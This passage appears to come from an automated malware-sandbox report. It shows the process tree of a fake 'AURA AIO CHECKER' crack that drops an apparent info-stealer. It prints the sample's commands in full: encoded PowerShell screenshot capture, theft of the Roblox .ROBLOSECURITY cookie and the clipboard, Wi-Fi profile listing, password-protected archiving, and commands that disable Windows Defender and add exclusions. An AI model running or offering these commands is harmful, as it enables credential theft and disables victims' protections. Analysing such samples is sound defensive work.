EAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:1512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:7440
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luufs0yt\luufs0yt.cmdline"
        6⤵
        
        PID:8056
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C5.tmp" "c:\Users\Admin\AppData\Local\Temp\luufs0yt\CSC5D79A6C6FD3F4DBAAD239BD5B86F6A.TMP"
        7⤵
        
        PID:6324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7696
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7908
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:8004
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:8080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:8096
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:8164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:8176
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:7340
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:804
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:7364
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41442\rar.exe a -r -hp"adrik123adi" "C:\Users\Admin\AppData\Local\Temp\6X16d.zip" *"
      4⤵
      PID:7936
    - - C:\Users\Admin\AppData\Local\Temp\_MEI41442\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI41442\rar.exe a -r -hp"adrik123adi" "C:\Users\Admin\AppData\Local\Temp\6X16d.zip" *
        5⤵
        Executes dropped EXE
        
        PID:7952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:8092
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:8124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6312
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:4828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6444
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:8128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:8104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:664
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:1144

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:7856

C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe
"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/cfWURYyUUj
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:7712
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff541a46f8,0x7fff541a4708,0x7fff541a4718
    3⤵
    PID:7404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
    3⤵
    PID:7968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
    3⤵
    PID:2312
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
    3⤵
    PID:6464
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
    3⤵
    PID:7588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:1332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
    3⤵
    PID:6436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3544 /prefetch:8
    3⤵
    PID:7500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2132,4651507033908382022,13853606195549117744,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3508 /prefetch:8
    3⤵
    - Modifies registry class
    PID:7192

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7016

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2d4 0x500
1⤵
PID:6768

C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\crack.exe
"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\crack.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4756
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAYgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAcwBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAdABnACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7276
- C:\Users\Admin\AppData\Local\Temp\Payload.exe
  "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
  2⤵
  - Executes dropped EXE
  PID:6332
- C:\Users\Admin\AppData\Local\Temp\crack.exe
  "C:\Users\Admin\AppData\Local\Temp\crack.exe"
  2⤵
  - Executes dropped EXE
  PID:7888
- - C:\Users\Admin\AppData\Local\Temp\crack.exe
    "C:\Users\Admin\AppData\Local\Temp\crack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:8104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\crack.exe'"
      4⤵
      PID:4524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\crack.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏ .scr'"
      4⤵
      PID:6912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4424
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:7672
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:8064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:8144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2540
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4500
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7996
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:8112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:4584
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:7612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA